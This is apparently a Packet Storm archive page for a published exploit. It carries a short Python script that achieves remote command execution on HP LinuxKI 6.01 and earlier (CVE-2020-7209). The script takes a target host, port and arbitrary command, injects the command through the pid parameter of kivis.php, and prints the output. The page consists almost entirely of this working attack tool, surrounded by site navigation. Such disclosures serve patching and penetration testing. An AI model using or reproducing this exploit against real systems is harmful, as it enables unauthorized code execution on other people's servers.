exploit the possibilities

HP LinuxKI 6.01 Remote Command Injection

HP LinuxKI 6.01 Remote Command Injection
Posted May 17, 2020
Authored by Cody Winkler

HP LinuxKI version 6.01 suffers from a command injection vulnerability.

tags | exploit
advisories | CVE-2020-7209
MD5 | c9d6eb68d20bc834e6391de308eca316

HP LinuxKI 6.01 Remote Command Injection

Change Mirror Download
Exploit Title: HP LinuxKI 6.01 - Remote Command Injection
Date: 2020-05-17
Exploit Author: Cody Winkler
Vendor Homepage: https://www.hpe.com/us/en/home.html
Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1
Version: <= v6.0-1
Tested on: LinuxKI Docker Image
CVE: CVE-2020-7209

#!/usr/bin/env python3

import requests
import argparse
import sys
import re

def parse_options():

formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter)
parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True)
parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True)
parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True)
args = parser.parse_args()
return args

def main(args):

host = args.host
port = args.port
cmd = args.cmd
path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd
rce = requests.get('http://' + host + ':' + port + path, verify=False)
output = rce.text
a, b = output.find('BEGIN'), output.find('END')
print(output[a+6:b])

if __name__ in "__main__":
args = parse_options()
main(args)
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    15 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close